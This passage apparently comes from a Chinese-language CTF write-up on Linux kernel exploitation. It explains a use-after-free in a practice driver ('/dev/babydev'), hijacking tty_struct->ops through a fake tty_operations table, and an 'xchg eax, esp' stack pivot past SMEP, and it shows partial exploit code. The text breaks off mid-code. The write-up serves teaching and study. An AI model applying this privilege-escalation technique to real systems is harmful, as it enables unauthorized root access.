class="keyword">else</span></span></span><br><span class="line">  <span class="type">char</span> _buf[<span class="number">512</span>];</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="type">char</span> *buf = _buf;</span><br><span class="line">  <span class="type">int</span> master, ret = <span class="number">-1</span>, slave = <span class="number">-1</span>;</span><br><span class="line"></span><br><span class="line">  *buf = <span class="string">&#x27;\0&#x27;</span>;</span><br><span class="line"></span><br><span class="line">  master = <span class="built_in">getpt</span> ();</span><br><span class="line">  <span class="keyword">if</span> (master == <span class="number">-1</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">grantpt</span> (master))</span><br><span class="line">    <span class="keyword">goto</span> on_error;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">unlockpt</span> (master))</span><br><span class="line">    <span class="keyword">goto</span> on_error;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> TIOCGPTPEER</span></span><br><span class="line">  <span class="comment">/* Try to allocate slave fd solely based on master fd first. */</span></span><br><span class="line">  slave = <span class="built_in">ioctl</span> (master, TIOCGPTPEER, O_RDWR | O_NOCTTY);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="keyword">if</span> (slave == <span class="number">-1</span>)</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="comment">/* Fallback to path-based slave fd allocation in case kernel doesn&#x27;t</span></span><br><span class="line"><span class="comment">       * support TIOCGPTPEER.</span></span><br><span class="line"><span class="comment">       */</span></span><br><span class="line">      <span class="keyword">if</span> (<span class="built_in">pts_name</span> (master, &amp;buf, <span class="built_in">sizeof</span> (_buf)))</span><br><span class="line">        <span class="keyword">goto</span> on_error;</span><br><span class="line"></span><br><span class="line">      slave = <span class="built_in">open</span> (buf, O_RDWR | O_NOCTTY);</span><br><span class="line">      <span class="keyword">if</span> (slave == <span class="number">-1</span>)</span><br><span class="line">        <span class="keyword">goto</span> on_error;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* XXX Should we ignore errors here?  */</span></span><br><span class="line">  <span class="keyword">if</span> (termp)</span><br><span class="line">    <span class="built_in">tcsetattr</span> (slave, TCSAFLUSH, termp);</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> TIOCSWINSZ</span></span><br><span class="line">  <span class="keyword">if</span> (winp)</span><br><span class="line">    <span class="built_in">ioctl</span> (slave, TIOCSWINSZ, winp);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">  *amaster = master;</span><br><span class="line">  *aslave = slave;</span><br><span class="line">  <span class="keyword">if</span> (name != <span class="literal">NULL</span>)</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> (*buf == <span class="string">&#x27;\0&#x27;</span>)</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">pts_name</span> (master, &amp;buf, <span class="built_in">sizeof</span> (_buf)))</span><br><span class="line">          <span class="keyword">goto</span> on_error;</span><br><span class="line"></span><br><span class="line">      <span class="built_in">strcpy</span> (name, buf);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  ret = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"> on_error:</span><br><span class="line">  <span class="keyword">if</span> (ret == <span class="number">-1</span>) &#123;</span><br><span class="line">    <span class="built_in">close</span> (master);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (slave != <span class="number">-1</span>)</span><br><span class="line">      <span class="built_in">close</span> (slave);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (buf != _buf)</span><br><span class="line">    <span class="built_in">free</span> (buf);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>login_tty</code>：用于实现在指定的终端上启动登录会话。源代码如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">login_tty</span> <span class="params">(<span class="type">int</span> fd)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 启动新会话</span></span><br><span class="line">  (<span class="type">void</span>) <span class="built_in">setsid</span>();</span><br><span class="line">    <span class="comment">// 设置为当前 fd 为控制终端</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> TIOCSCTTY</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">ioctl</span>(fd, TIOCSCTTY, (<span class="type">char</span> *)<span class="literal">NULL</span>) == <span class="number">-1</span>)</span><br><span class="line">    <span class="keyword">return</span> (<span class="number">-1</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="comment">/* This might work.  */</span></span><br><span class="line">    <span class="type">char</span> *fdname = <span class="built_in">ttyname</span> (fd);</span><br><span class="line">    <span class="type">int</span> newfd;</span><br><span class="line">    <span class="keyword">if</span> (fdname)</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="keyword">if</span> (fd != <span class="number">0</span>)</span><br><span class="line">    (<span class="type">void</span>) <span class="built_in">close</span> (<span class="number">0</span>);</span><br><span class="line">        <span class="keyword">if</span> (fd != <span class="number">1</span>)</span><br><span class="line">    (<span class="type">void</span>) <span class="built_in">close</span> (<span class="number">1</span>);</span><br><span class="line">        <span class="keyword">if</span> (fd != <span class="number">2</span>)</span><br><span class="line">    (<span class="type">void</span>) <span class="built_in">close</span> (<span class="number">2</span>);</span><br><span class="line">        newfd = <span class="built_in">open</span> (fdname, O_RDWR);</span><br><span class="line">        (<span class="type">void</span>) <span class="built_in">close</span> (newfd);</span><br><span class="line">      &#125;</span><br><span class="line">  &#125;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="keyword">while</span> (<span class="built_in">dup2</span>(fd, <span class="number">0</span>) == <span class="number">-1</span> &amp;&amp; errno == EBUSY)</span><br><span class="line">    ;</span><br><span class="line">  <span class="keyword">while</span> (<span class="built_in">dup2</span>(fd, <span class="number">1</span>) == <span class="number">-1</span> &amp;&amp; errno == EBUSY)</span><br><span class="line">    ;</span><br><span class="line">  <span class="keyword">while</span> (<span class="built_in">dup2</span>(fd, <span class="number">2</span>) == <span class="number">-1</span> &amp;&amp; errno == EBUSY)</span><br><span class="line">    ;</span><br><span class="line">  <span class="keyword">if</span> (fd &gt; <span class="number">2</span>)</span><br><span class="line">    (<span class="type">void</span>) <span class="built_in">close</span>(fd);</span><br><span class="line">  <span class="keyword">return</span> (<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>forkpty</code>：整合了<code>openpty</code>, <code>fork</code> 和 <code>login_tty</code>，在网络服务程序可用于为新登录用户打开一对伪终端，并创建相应的会话子进程。源代码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">forkpty</span> <span class="params">(<span class="type">int</span> *amaster, <span class="type">char</span> *name, <span class="type">const</span> <span class="keyword">struct</span> termios *termp,</span></span></span><br><span class="line"><span class="params"><span class="function">   <span class="type">const</span> <span class="keyword">struct</span> winsize *winp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="type">int</span> master, slave, pid;</span><br><span class="line">  <span class="comment">// 启动新 pty</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">openpty</span> (&amp;master, &amp;slave, name, termp, winp) == <span class="number">-1</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">switch</span> (pid = fork ())</span><br><span class="line">    &#123;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">-1</span>:</span><br><span class="line">      <span class="built_in">close</span> (master);</span><br><span class="line">      <span class="built_in">close</span> (slave);</span><br><span class="line">      <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">0</span>:</span><br><span class="line">      <span class="comment">/* Child.  */</span></span><br><span class="line">      <span class="built_in">close</span> (master);</span><br><span class="line">      <span class="keyword">if</span> (<span class="built_in">login_tty</span> (slave))</span><br><span class="line">  _exit (<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">      <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">default</span>:</span><br><span class="line">      <span class="comment">/* Parent.  */</span></span><br><span class="line">      *amaster = master;</span><br><span class="line">      <span class="built_in">close</span> (slave);</span><br><span class="line"></span><br><span class="line">      <span class="keyword">return</span> pid;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h5 id="3-tty-struct-结构的利用">3) tty_struct 结构的利用</h5><p>当我们执行 <code>open(&quot;/dev/ptmx&quot;, flag)</code> 时，内核会通过以下函数调用链，分配一个 <code>struct tty_struct</code> 结构体：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ptmx_open (drivers/tty/pty.c)</span><br><span class="line">-&gt; tty_init_dev (drivers/tty/tty_io.c)</span><br><span class="line">  -&gt; alloc_tty_struct (drivers/tty/tty_io.c)</span><br></pre></td></tr></table></figure><p><code>struct tty_struct</code> 的结构如下所示：</p><blockquote><p>sizeof(struct tty_struct) == 0x2e0</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">tty_struct</span> &#123;</span><br><span class="line">  <span class="type">int</span>  magic;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">kref</span> kref;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">device</span> *dev;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">tty_driver</span> *driver;</span><br><span class="line">  <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">tty_operations</span> *ops;</span><br><span class="line">  <span class="type">int</span> index;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Protects ldisc changes: Lock tty not pty */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">ld_semaphore</span> ldisc_sem;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">tty_ldisc</span> *ldisc;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">mutex</span> atomic_write_lock;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">mutex</span> legacy_mutex;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">mutex</span> throttle_mutex;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">rw_semaphore</span> termios_rwsem;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">mutex</span> winsize_mutex;</span><br><span class="line">  <span class="type">spinlock_t</span> ctrl_lock;</span><br><span class="line">  <span class="type">spinlock_t</span> flow_lock;</span><br><span class="line">  <span class="comment">/* Termios values are protected by the termios rwsem */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">ktermios</span> termios, termios_locked;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">termiox</span> *termiox;  <span class="comment">/* May be NULL for unsupported */</span></span><br><span class="line">  <span class="type">char</span> name[<span class="number">64</span>];</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">pid</span> *pgrp;    <span class="comment">/* Protected by ctrl lock */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">pid</span> *session;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> flags;</span><br><span class="line">  <span class="type">int</span> count;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">winsize</span> winsize;    <span class="comment">/* winsize_mutex */</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> stopped:<span class="number">1</span>,  <span class="comment">/* flow_lock */</span></span><br><span class="line">          flow_stopped:<span class="number">1</span>,</span><br><span class="line">          unused:BITS_PER_LONG - <span class="number">2</span>;</span><br><span class="line">  <span class="type">int</span> hw_stopped;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> ctrl_status:<span class="number">8</span>,  <span class="comment">/* ctrl_lock */</span></span><br><span class="line">          packet:<span class="number">1</span>,</span><br><span class="line">          unused_ctrl:BITS_PER_LONG - <span class="number">9</span>;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> receive_room;  <span class="comment">/* Bytes free for queue */</span></span><br><span class="line">  <span class="type">int</span> flow_change;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">tty_struct</span> *link;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">fasync_struct</span> *fasync;</span><br><span class="line">  <span class="type">int</span> alt_speed;    <span class="comment">/* For magic substitution of 38400 bps */</span></span><br><span class="line">  <span class="type">wait_queue_head_t</span> write_wait;</span><br><span class="line">  <span class="type">wait_queue_head_t</span> read_wait;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">work_struct</span> hangup_work;</span><br><span class="line">  <span class="type">void</span> *disc_data;</span><br><span class="line">  <span class="type">void</span> *driver_data;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">list_head</span> tty_files;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> N_TTY_BUF_SIZE 4096</span></span><br><span class="line"></span><br><span class="line">  <span class="type">int</span> closing;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">char</span> *write_buf;</span><br><span class="line">  <span class="type">int</span> write_cnt;</span><br><span class="line">  <span class="comment">/* If the tty has a pending do_SAK, queue it here - akpm */</span></span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">work_struct</span> SAK_work;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">tty_port</span> *port;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>注意到第五个字段 <code>const struct tty_operations *ops</code>，<code>struct tty_operations</code>结构体实际上是多个函数指针的集合：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">tty_operations</span> &#123;</span><br><span class="line">  <span class="keyword">struct</span> <span class="title class_">tty_struct</span> * (*lookup)(<span class="keyword">struct</span> tty_driver *driver,</span><br><span class="line">      <span class="keyword">struct</span> inode *inode, <span class="type">int</span> idx);</span><br><span class="line">  <span class="built_in">int</span>  (*install)(<span class="keyword">struct</span> tty_driver *driver, <span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">void</span> (*remove)(<span class="keyword">struct</span> tty_driver *driver, <span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">int</span>  (*open)(<span class="keyword">struct</span> tty_struct * tty, <span class="keyword">struct</span> file * filp);</span><br><span class="line">  <span class="built_in">void</span> (*close)(<span class="keyword">struct</span> tty_struct * tty, <span class="keyword">struct</span> file * filp);</span><br><span class="line">  <span class="built_in">void</span> (*shutdown)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">void</span> (*cleanup)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">int</span>  (*write)(<span class="keyword">struct</span> tty_struct * tty,</span><br><span class="line">          <span class="type">const</span> <span class="type">unsigned</span> <span class="type">char</span> *buf, <span class="type">int</span> count);</span><br><span class="line">  <span class="built_in">int</span>  (*put_char)(<span class="keyword">struct</span> tty_struct *tty, <span class="type">unsigned</span> <span class="type">char</span> ch);</span><br><span class="line">  <span class="built_in">void</span> (*flush_chars)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">int</span>  (*write_room)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">int</span>  (*chars_in_buffer)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">int</span>  (*ioctl)(<span class="keyword">struct</span> tty_struct *tty,</span><br><span class="line">        <span class="type">unsigned</span> <span class="type">int</span> cmd, <span class="type">unsigned</span> <span class="type">long</span> arg);</span><br><span class="line">  <span class="built_in">long</span> (*compat_ioctl)(<span class="keyword">struct</span> tty_struct *tty,</span><br><span class="line">           <span class="type">unsigned</span> <span class="type">int</span> cmd, <span class="type">unsigned</span> <span class="type">long</span> arg);</span><br><span class="line">  <span class="built_in">void</span> (*set_termios)(<span class="keyword">struct</span> tty_struct *tty, <span class="keyword">struct</span> ktermios * old);</span><br><span class="line">  <span class="built_in">void</span> (*throttle)(<span class="keyword">struct</span> tty_struct * tty);</span><br><span class="line">  <span class="built_in">void</span> (*unthrottle)(<span class="keyword">struct</span> tty_struct * tty);</span><br><span class="line">  <span class="built_in">void</span> (*stop)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">void</span> (*start)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">void</span> (*hangup)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">int</span> (*break_ctl)(<span class="keyword">struct</span> tty_struct *tty, <span class="type">int</span> state);</span><br><span class="line">  <span class="built_in">void</span> (*flush_buffer)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">void</span> (*set_ldisc)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">void</span> (*wait_until_sent)(<span class="keyword">struct</span> tty_struct *tty, <span class="type">int</span> timeout);</span><br><span class="line">  <span class="built_in">void</span> (*send_xchar)(<span class="keyword">struct</span> tty_struct *tty, <span class="type">char</span> ch);</span><br><span class="line">  <span class="built_in">int</span> (*tiocmget)(<span class="keyword">struct</span> tty_struct *tty);</span><br><span class="line">  <span class="built_in">int</span> (*tiocmset)(<span class="keyword">struct</span> tty_struct *tty,</span><br><span class="line">      <span class="type">unsigned</span> <span class="type">int</span> set, <span class="type">unsigned</span> <span class="type">int</span> clear);</span><br><span class="line">  <span class="built_in">int</span> (*resize)(<span class="keyword">struct</span> tty_struct *tty, <span class="keyword">struct</span> winsize *ws);</span><br><span class="line">  <span class="built_in">int</span> (*set_termiox)(<span class="keyword">struct</span> tty_struct *tty, <span class="keyword">struct</span> termiox *tnew);</span><br><span class="line">  <span class="built_in">int</span> (*get_icount)(<span class="keyword">struct</span> tty_struct *tty,</span><br><span class="line">        <span class="keyword">struct</span> serial_icounter_struct *icount);</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> CONFIG_CONSOLE_POLL</span></span><br><span class="line">  <span class="built_in">int</span> (*poll_init)(<span class="keyword">struct</span> tty_driver *driver, <span class="type">int</span> line, <span class="type">char</span> *options);</span><br><span class="line">  <span class="built_in">int</span> (*poll_get_char)(<span class="keyword">struct</span> tty_driver *driver, <span class="type">int</span> line);</span><br><span class="line">  <span class="built_in">void</span> (*poll_put_char)(<span class="keyword">struct</span> tty_driver *driver, <span class="type">int</span> line, <span class="type">char</span> ch);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">file_operations</span> *proc_fops;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>我们可以试着通过 UAF, 修改<strong>新</strong>分配的 tty_struct 上的 <code>const struct tty_operations *ops</code>，使其指向一个伪造的 <code>tty_operations</code>结构体，这样就可以搭配一些操作（例如 open、ioctl 等等）来劫持控制流。</p><blockquote><p>注：tty_operations 函数指针的使用，位于<code>drivers/tty/tty_io.c</code>的各类 <code>tty_xxx</code>函数中。</p></blockquote><p>但由于开启了 SMEP 保护，此时的控制流<strong>只能在内核代码中执行</strong>，不能跳转至用户代码。</p><h5 id="4-ROP-利用">4) ROP 利用</h5><p>为了达到提权目的，我们需要完成以下几件事情：</p><ol><li>提权</li><li>绕过 SMEP，执行用户代码</li></ol><h6 id="4-1-劫持栈指针">4.1) 劫持栈指针</h6><p>我们需要通过 ROP 来完成上述操作，但问题是，<strong>用户无法控制内核栈</strong>。因此我们必须使用一些特殊 gadget 来<strong>将栈指针劫持到用户空间</strong>，之后再利用用户空间上的 ROP 链进行一系列控制流跳转。</p><p>获取 gadget 的方式有很多。可以使用之前用的 <code>ROPgadget</code> 工具，优点是可以将分析结果通过管道保存至文件中，但缺点是该工具在 kernel 层面上会跑的很慢。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary vmlinux</span><br></pre></td></tr></table></figure><p>有个速度比较快的工具可以试试，那就是 <code>ropper</code>工具：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pip3 install ropper</span><br><span class="line">ropper --file vmlinux --console</span><br></pre></td></tr></table></figure><p>我们可以手动构造一个 <strong>fake_tty_operations</strong>，并修改其中的 <code>write</code> 函数指针指向一个 xchg 指令。这样当对 <code>/dev/ptmx</code> 执行 write 操作时，内核就会通过以下调用链：</p><blockquote><p><code>tty_write</code> -&gt; <code>do_tty_write</code> -&gt; <code>do_tty_write</code> -&gt; <code>n_tty_write</code> -&gt;  <code>tty-&gt;ops-&gt;write</code></p></blockquote><p>进一步使用到 <code>tty-&gt;ops-&gt;write</code>函数指针，最终执行 <code>xchg</code> 指令。</p><p>但问题是，执行什么样的 xchg 指令？通过动态调试与 IDA 静态分析，最终找到了实际调用 <code>tty-&gt;ops-&gt;write</code>的指令位置：</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">.text:</span>FFFFFFFF814DC0C3                 <span class="keyword">call</span>    <span class="built_in">qword</span> <span class="built_in">ptr</span> [<span class="built_in">rax</span>+<span class="number">38h</span>]</span><br></pre></td></tr></table></figure><p>由于当控制流执行至此处时，只有 <code>%rax</code> 是用户可控的（即<code>fake_tty_operations</code>基地址），因此我们尝试使用以下 gadget，劫持 <code>%rsp</code> 指针至用户空间：</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0xffffffff8100008a</span> : <span class="keyword">xchg</span> <span class="built_in">eax</span>, <span class="built_in">esp</span> <span class="comment">; ret</span></span><br></pre></td></tr></table></figure><blockquote><p>注意：<code>xchg eax, esp</code>将<strong>清空两个寄存器的高位部分</strong>。因此执行完成后，%rsp 的高四字节为0，此时指向用户空间。我们可以使用 mmap 函数占据这块内存，并放上 ROP 链。</p></blockquote><p>以下是劫持栈指针的部分代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> fd1 = <span class="built_in">open</span>(<span class="string">&quot;/dev/babydev&quot;</span>, O_RDWR);</span><br><span class="line"><span class="type">int</span> fd2 = <span class="built_in">open</span>(<span class="string">&quot;/dev/babydev&quot;</span>, O_RDWR);</span><br><span class="line"><span class="built_in">ioctl</span>(fd1, <span class="number">65537</span>, <span class="number">0x2e0</span>);</span><br><span class="line"></span><br><span class="line"><span class="built_in">close</span>(fd1);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 申请 tty_struct</span></span><br><span class="line"><span class="type">int</span> master_fd = <span class="built_in">open</span>(<span class="string">&quot;/dev/ptmx&quot;</span>, O_RDWR);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 构造一个 fake tty_operators</span></span><br><span class="line"><span class="type">u_int64_t</span> fake_tty_ops[] = &#123;</span><br><span class="line">    <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>,</span><br><span class="line">    xchg_eax_esp_addr, <span class="comment">// int  (*write)(struct tty_struct*, const unsigned char *, int)</span></span><br><span class="line">&#125;;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[+] fake_tty_ops constructed\n&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="type">u_int64_t</span> hijacked_stack_addr = ((<span class="type">u_int64_t</span>)fake_tty_ops &amp; <span class="number">0xffffffff</span>);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[+] hijacked_stack addr: %p\n&quot;</span>, (<span class="type">char</span>*)hijacked_stack_addr);</span><br><span class="line"></span><br><span class="line"><span class="type">char</span>* fake_stack = <span class="literal">NULL</span>;</span><br><span class="line"><span class="keyword">if</span> ((fake_stack = <span class="built_in">mmap</span>(</span><br><span class="line">    (<span class="type">char</span>*)(hijacked_stack_addr &amp; (~<span class="number">0xfff</span>)),    <span class="comment">// addr, 页对齐</span></span><br><span class="line">    <span class="number">0x1000</span>,                                     <span 